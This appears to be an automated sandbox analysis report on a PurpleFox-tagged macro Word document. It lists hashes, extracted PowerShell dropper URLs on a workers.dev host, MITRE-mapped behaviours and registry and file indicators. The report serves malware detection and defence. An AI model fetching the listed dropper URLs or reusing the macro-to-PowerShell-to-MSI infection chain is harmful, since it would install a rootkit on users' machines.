purplefox | 38f581881093c044667d565a698aa389f14585a58d5c8b692dc2be851293f1c2

Resubmissions

21/09/2023, 07:25

230921-h86p5sgc32 10

20/09/2023, 23:55

230920-3yrhpabc6y 10

Analysis

max time kernel
121s
max time network
124s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
20/09/2023, 23:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ID-191304203986.docm
Size

44KB
MD5

8c498f9e6dd65c5a9704208922224661
SHA1

1dc2f872c2e23e1eb0c6090909c5807553ad1e75
SHA256

38f581881093c044667d565a698aa389f14585a58d5c8b692dc2be851293f1c2
SHA512

b6a5eceef6739421ed2f0f6a479df496ecb1894b7694651b24a50689d663b1d7f1b1bf58c2edacf6a2fa59908a58f25cd00e389765871cb1856acb3431bcca50
SSDEEP

768:T6D/hwDg0kIo+rQGtBMIYta9l87miNPZjinjUeipoRkqk:T6D/u801rQIBMNg86AB+njUpoqqk

Score

10^/10

purplefox discovery evasion rootkit trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace.jpg

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/T2qomNwfFUeS/62f331959dde379b2536caed26a74ae8460c0c30/all.png

Extracted

Language

ps1

Source

URLs

exe.dropper

http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/5hwtrLyyHFiv/7b0985c861986ec9e2087ade8273e544009d68e1/SsdxxIp8DqeQ.jpg

Signatures

Detect PurpleFox MSI 1 IoCs

Detect PurpleFox MSI.

rootkit

resource	yara_rule
behavioral1/files/0x0009000000015c7f-75.dat	purplefox_msi

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	2744	3024	PowerShell.exe	27

PurpleFox
PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.
rootkit trojan purplefox

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2164	powershell.exe
4	2912	powershell.exe
5	1352	msiexec.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Loads dropped DLL 4 IoCs

pid	Process
1212	MsiExec.exe
1212	MsiExec.exe
1212	MsiExec.exe
1212	MsiExec.exe

Modifies file permissions 1 TTPs 6 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1384	takeown.exe
2376	takeown.exe
1596	takeown.exe
2648	takeown.exe
588	takeown.exe
1696	takeown.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI64FA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI68C2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6CBB.tmp	msiexec.exe
File created	C:\Windows\Installer\f766d27.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6FF7.tmp	msiexec.exe
File created	C:\Windows\dbcode86mk.log	msiexec.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE
File opened for modification	C:\Windows\Installer\f766d27.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6C3E.tmp	msiexec.exe
File created	C:\Windows\.xml	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6AC6.tmp	msiexec.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1920	sc.exe
2520	sc.exe

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE

Modifies data under HKEY_USERS 44 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D	msiexec.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E	msiexec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	msiexec.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30e3ef021eecd901	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E	msiexec.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3024	WINWORD.EXE

